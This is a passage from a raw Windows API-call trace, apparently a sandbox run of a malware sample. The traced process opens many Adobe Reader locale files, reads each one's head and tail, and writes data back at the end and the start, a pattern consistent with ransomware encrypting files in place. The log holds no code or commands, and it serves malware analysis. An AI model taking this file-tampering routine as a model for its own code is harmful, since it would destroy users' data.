10.0\\Reader\\Locale\\ru_RU\\Checkers.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\checkers.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.095] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.095] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1f000 [0085.095] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.095] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.095] ReleaseMutex (hMutex=0x168) returned 1 [0085.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.RUS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.RUS", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.RUS", lpUsedDefaultChar=0x0) returned 12 [0085.096] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.103] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e000 [0085.104] ReadFile (in: hFile=0x204, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.120] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e000 [0085.120] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.120] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.121] WriteFile (in: hFile=0x204, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.121] CloseHandle (hObject=0x204) returned 1 [0085.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\PDDom.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\pddom.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.127] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.127] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2e00 [0085.127] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.128] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.128] ReleaseMutex (hMutex=0x168) returned 1 [0085.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.RUS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.RUS", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.RUS", lpUsedDefaultChar=0x0) returned 9 [0085.128] ReadFile (in: hFile=0x204, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.136] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e00 [0085.136] ReadFile (in: hFile=0x204, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.148] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e00 [0085.148] WriteFile (in: hFile=0x204, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.149] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.149] WriteFile (in: hFile=0x204, lpBuffer=0x25ad0a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.149] CloseHandle (hObject=0x204) returned 1 [0085.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.150] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.150] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb6ba [0085.150] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.150] ReleaseMutex (hMutex=0x168) returned 1 [0085.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.150] ReadFile (in: hFile=0x204, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.163] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa6ba [0085.163] ReadFile (in: hFile=0x204, lpBuffer=0x25ad0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.165] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa6ba [0085.165] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.166] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.166] WriteFile (in: hFile=0x204, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.166] CloseHandle (hObject=0x204) returned 1 [0085.167] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Annots.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\annots.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0085.167] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.167] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x79800 [0085.167] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.167] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.167] ReleaseMutex (hMutex=0x168) returned 1 [0085.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SKY", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SKY", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.SKY", lpUsedDefaultChar=0x0) returned 10 [0085.168] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0085.178] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x78800 [0085.178] ReadFile (in: hFile=0x204, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.184] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x78800 [0085.185] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.185] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.185] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.185] CloseHandle (hObject=0x204) returned 1 [0085.186] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\makeaccessible.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\makeaccessible.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.510] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.517] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x12200 [0085.517] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.517] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.517] ReleaseMutex (hMutex=0x168) returned 1 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.SKY", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.SKY", cchWideChar=18, lpMultiByteStr=0x1f88bcc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.SKY", lpUsedDefaultChar=0x0) returned 18 [0085.518] ReadFile (in: hFile=0x1e4, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.524] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11200 [0085.524] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.525] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11200 [0085.525] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.525] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.526] WriteFile (in: hFile=0x1e4, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.526] CloseHandle (hObject=0x1e4) returned 1 [0085.526] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Search.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\search.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.527] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.528] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5c00 [0085.528] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.528] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.528] ReleaseMutex (hMutex=0x168) returned 1 [0085.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SKY", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SKY", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.SKY", lpUsedDefaultChar=0x0) returned 10 [0085.528] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.537] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4c00 [0085.537] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.537] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4c00 [0085.537] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.538] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.539] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.539] CloseHandle (hObject=0x1e4) returned 1 [0085.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Acroform.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\acroform.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.540] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.540] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x63800 [0085.540] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.541] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.541] ReleaseMutex (hMutex=0x168) returned 1 [0085.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SLV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SLV", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.SLV", lpUsedDefaultChar=0x0) returned 12 [0085.541] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0085.549] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x62800 [0085.549] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.554] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x62800 [0085.555] WriteFile (in: hFile=0x1e4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.555] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.555] WriteFile (in: hFile=0x1e4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.556] CloseHandle (hObject=0x1e4) returned 1 [0085.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\EScript.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\escript.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.557] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.557] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9e00 [0085.557] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.557] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.557] ReleaseMutex (hMutex=0x168) returned 1 [0085.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SLV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SLV", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.SLV", lpUsedDefaultChar=0x0) returned 11 [0085.557] ReadFile (in: hFile=0x1e4, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.564] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8e00 [0085.564] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, 